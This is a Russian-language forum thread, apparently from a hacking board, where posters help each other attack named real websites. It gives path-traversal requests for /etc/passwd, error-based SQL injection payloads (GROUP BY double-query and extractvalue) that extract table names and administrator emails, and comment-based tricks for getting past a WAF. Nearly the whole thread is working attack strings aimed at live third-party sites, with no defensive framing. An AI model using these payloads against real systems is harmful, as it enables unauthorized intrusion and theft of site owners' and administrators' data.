Есть скрипт echo file_get_contents('fike_'.$_GET['file']); есть идеи как прочитать index.php или еще что нибудь??)
.php?file=/../../../../../etc/passwd .php?file=/../index.php PS. Br@!ns, Code: https://www.phd-fitness.co.uk/store/user_account.php?lang=1%27+and+substr%28@@version,1,1%29=5--+ скобки там фильтруются, однако урл-кодирование решит эту проблему
По линку нет. route - не динамический параметр: /u/index.php?product_id=36103 product_id - int casting: /u/index.php?product_id=36103x /u/index.php?product_id=x36103
ppppppppppppp млин ... подскажите запрос пост &more[]=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' ответ Duplicate entry 'ex_info:1' for key 'group_key' ну блин а дальше тупик,как зти таблицы вытащить((
Code: (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' и перебирайте лимитом все поля и, кстати, можно проще запрос Code: and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1)))) UPDATE: Code: 1'and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))='1 вот так должно сработать
спасибо ,вот проще не идёт You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '";}',
можно ещё вопросик что я опять делаю не так (SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' возращает 16 а (SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' возращает Subquery returns more than 1 row (((
попробуйте так: Code: (SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' изменив на нужный id.
Code: (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT substr(group_concat(email),1,150) FROM administrator),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' если проблема не решится, отпишите мне в jabber, не стоит захламлять тему. вам бы для начала прочитать маны mysql неплохо бы было.
Code: (SELECT COUNT(*),CONCAT((SELECT mid(email,1,20) FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
есть user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь? PS много запросов не делайте часто, забанит
Code: http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1 http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1
как обойти такую WAF? HTML: https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+ HTML: https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+ фильтрует комбинацию union+select и concat
Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7. Code: /store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
а как дальше вот это обойти можно? HTML: https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20